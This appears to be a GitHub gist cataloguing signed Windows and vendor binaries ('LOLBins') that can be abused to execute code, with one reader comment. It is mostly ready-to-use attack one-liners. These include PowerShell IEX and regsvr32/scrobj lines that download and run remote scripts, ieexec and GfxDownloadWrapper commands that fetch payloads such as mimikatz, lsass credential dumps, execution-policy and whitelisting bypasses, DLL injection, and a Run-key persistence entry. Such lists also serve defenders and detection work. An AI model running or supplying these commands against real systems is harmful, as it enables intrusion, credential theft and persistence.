@api0cradle
Last active May 21, 2023 17:28
BinariesThatDoesOtherStuff
forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe
bash.exe -c calc.exe
scriptrunner.exe -appvscript calc.exe
SyncAppvPublishingServer.exe "n;((New-Object Net.WebClient).DownloadString('http://some.url/script.ps1') | IEX
hh.exe http://www.google.com or hh.exe c:\
certutil -Class scrobj.dll
certutil -Class http://WScript.Shell
certutil -urlcache -split -f http://example.com/file
certutil.exe -URL will fetch ANY file and download it here: C:\Users\subTee\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content
rundll32.exe javascript:"..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/');"
RUNDLL32.EXE scrobj.dll,GenerateTypeLib test.sct http://[URL] - Doesn't exec, download only
https://twitter.com/subtee/status/777538038897397761
regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll
msbuild.exe pshell.xml
regsvcs.exe /U regsvcs.dll regsvcs.exe regsvcs.dll
regasm.exe /U regsvcs.dll regasm.exe regsvcs.dll
bginfo.exe bginfo.bgi /popup /nolicprompt
InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll
ieexec.exe http://x.x.x.x:8080/bypass.exe
msxsl.exe customers.xml script.xsl
odbcconf.exe /f my.rsp
sqldumper.exe 464 0 0x0110:40 - Dump lsass to a mimikatz-compatible dump
https://twitter.com/countuponsec/status/910977826853068800
sqldumper.exe 540 0 0x01100
https://twitter.com/countuponsec/status/910969424215232518
pcalua -a c:\datafolder\tester.bat
pcalua.exe -a \\server\payload.dll
pcalua.exe -a C:\Windows\system32\javacpl.cpl -c Java
https://twitter.com/0rbz_/status/912530504871759872
C:\Program Files\Microsoft Office\root\client\AppVLP.exe calc.exe
C:\Program Files (x86)\Microsoft Office\root\client>appvlp calc.exe
https://twitter.com/0rbz_/status/915330892637331456
runscripthelper.exe
https://posts.specterops.io/bypassing-application-whitelisting-with-runscripthelper-exe-1906923658fc
winword /l dllfile.dll
https://twitter.com/subTee/status/884615369511636992
InfDefaultInstall.exe shady.inf
https://twitter.com/KyleHanslovan/status/911997635455852544
https://gist.github.com/KyleHanslovan/5e0f00d331984c1fb5be32c40f3b265a
fsi.exe
https://twitter.com/NickTyrer/status/904273264385589248
AppVLP.exe
"C:\Program Files\Microsoft Office\root\client\AppVLP.exe" calc.exe
"C:\Program Files (x86)\Microsoft Office\root\client\AppVLP.exe" calc.exe
AppVLP.exe \\webdav\calc.bat
SQLPS.exe
PowerShell host
https://twitter.com/bryon_/status/975835709587075072
Diskshadow.exe
diskshadow.exe /s c:\test\diskshadow.txt
diskshadow> exec calc.exe
https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/
print /D:c:\ads\file.exe \\server.domain.com\tool\file.exe
print /D:c:\ads\CopyOfAutoruns.exe c:\ads\Autoruns.exe
https://www.youtube.com/watch?v=nPBcSP8M7KE
*** Non-MS binaries ***
nvuhda.exe
nvuhda6.exe
nvuhda6.exe System calc.exe
nvuhda6.exe Copy test.txt,test-2.txt
nvuhda6.exe SetReg HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\malware=malware.exe
nvuhda6.exe CreateShortcut test.lnk,"Test","c:\windows\system32\calc.exe","","c:\windows\system32"
nvuhda6.exe KillApp calculator.exe
nvuhda6.exe Run foo
http://www.hexacorn.com/blog/2017/11/10/reusigned-binaries-living-off-the-signed-land/
symerr.exe ("cclib.dll" in same directory) - https://twitter.com/0rbz_/status/940028712766005248
SynTPEnh.exe /SHELLEXEC somebinary.exe - https://twitter.com/egre55/status/1052907871749459968?s=09
#Intel
GfxDownloadWrapper.exe "http://10.10.10.10/mimikatz.exe" "C:\Temp\harmless.exe" - https://twitter.com/egre55/status/1093821740298448896
iAutorun.exe (Intel Pro Wireless software)
Put in autorun.inf:
XP_APPS_32=c:\windows\system32\notepad.exe
XP_APPS_64=c:\windows\system32\notepad.exe
VISTA_APPS_32=c:\windows\system32\notepad.exe
VISTA_APPS_64=c:\windows\system32\notepad.exe
WIN7_APPS_32=c:\windows\system32\notepad.exe
WIN7_APPS_64=c:\windows\system32\notepad.exe
WIN8_APPS_32=c:\windows\system32\notepad.exe
WIN8_APPS_64=c:\windows\system32\notepad.exe
WINPLUS_APPS_32=c:\windows\system32\notepad.exe
WINPLUS_APPS_64=c:\windows\system32\notepad.exe
RUNMODE=WAIT
http://www.hexacorn.com/blog/2019/08/20/sitting-on-the-lolbins-2/
LaunchDelay.exe notepad.exe 5
Sample: 775DBEC29C3558A61CCFFDBA6E319E4BCF2C5C2EA91C6F5AF04E88C699B7D7A8
http://www.hexacorn.com/blog/2019/08/22/sitting-on-the-lolbins-3/
#Acer
RunCmd_x64.exe C:\windows\system32\calc.exe
https://bartblaze.blogspot.com/2019/03/run-applications-and-scripts-using.html
#Plex
plexscripthost.exe # Python script engine
https://twitter.com/Oddvarmoe/status/1092230434786869249
#Splunk
%USERPROFILE%\AppData\Local\slack\update.exe --processStart "test.exe"
https://twitter.com/Hexacorn/status/1108429585602019328
#notepad++
Gpup.exe -w whatever -e c:\Windows\System32\calc.exe
#Lotus Notes
Notes.exe "=N:\Lotus\Notes\Data\notes.ini" -Command if((Get-ExecutionPolicy) -ne AllSigned) { Set-ExecutionPolicy -Scope Process Bypass }
Runs PowerShell via Lotus Notes
#Citrix
C:\Program Files (x86)\Citrix\ICA Client\Drivers64\Usbinst.exe InstallHinfSection "DefaultInstall 128 c:\temp\calc.inf"
Executes calc.exe through the DefaultInstall section directive in an INF file.
#Tanium
Tpowershell.exe
https://twitter.com/Hexacorn/status/1108288002193805312
#Nvidia GeForce Experience
courgette.exe -dis c:\temp\Autoruns.exe c:\temp\autoruns.asm
courgette.exe -asm c:\temp\autoruns.asm c:\temp\compiled\autorunsfromasm.exe
https://twitter.com/Oddvarmoe/status/1123249551756935169
#Avast
aswRunDll.exe c:\temp\myDll.dll
https://twitter.com/pabraeken/status/1000806146805059585
#Valve
C:\program files(x86)\Steam> writeminidump.exe <PID> C:\outfolder\outfile.dmp
https://twitter.com/pabraeken/status/1000507477329432586
#PUBG Lite
C:\Program Files (x86)\PUBGLite\Client\ucldr_bgl_se.exe mimikatz.exe
https://twitter.com/_felamos/status/1148166305129758720?s=21
#HP Printer drivers
c:\Program Files\HP\<model>\
\Bin\<model>.exe
\Bin\HPCustParticUI.exe
\Bin\hpqDTSS.exe
\Bin\InstanceFinderDlg.exe
\Bin\ScanToPCActivationApp.exe
\Bin\Toolbox.exe
<binary>.exe -uiDll c:\Test\test.dll
Also possible, but needs more arguments:
\Bin\DigitalWizards.exe
\Bin\FaxApplications.exe
\Bin\HPRewards.exe
http://www.hexacorn.com/blog/2019/08/19/sitting-on-the-lolbins-1/
#ZOHO Corporation Private Limited
dctask64.exe injectDll <dllpath> <PID>
dctask64.exe invokeexe <executable>
https://twitter.com/gN3mes1s/status/1222088214581825540
#Avira Antivirus
type cmd.txt | Avira.PWM.NativeMessaging.exe - in a .bat file
https://medium.com/@knikolenko/avira-free-antivirus-password-collector-83452fa7f943
https://twitter.com/malwrhunterteam/status/1258346778421846017
#Cisco Jabber
cd c:\program files (x86)\cisco systems\cisco jabber\x64\
processdump.exe (ps lsass).id c:\temp\lsass.dmp
https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dump-credentials-from-lsass-process-without-mimikatz#processdump-exe-from-cisco-jabber
https://twitter.com/spotheplanet/status/1310606426172162050
#Discord
discordhookhelper64.exe inject DiscordHook64.dll 0 3785
https://twitter.com/Blackmond_/status/1317035680682397701
#Symantec
https://twitter.com/nas_bench/status/1385599433333686278
#Spotify
https://twitter.com/Hexacorn/status/1412517463892414469
SpotifySetup.exe --url <url>
Other options:
--mu ..\..\..\..\..\..\..\..\test\ - downloads that file to c:\test\SpWebInst0.exe and launches it from there
--silent - quieter, but a mini-GUI still shows up
fsacer commented Nov 11, 2017

You could add this even though it's a script:
cscript C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost "script:https://gist.githubusercontent.com/enigma0x3/2e4f571fe76715640d0f8126f321ba07/raw/73c962d65059a211b5d7ea212e9a1054d632622b/new.txt"
https://twitter.com/enigma0x3/status/923311244358094848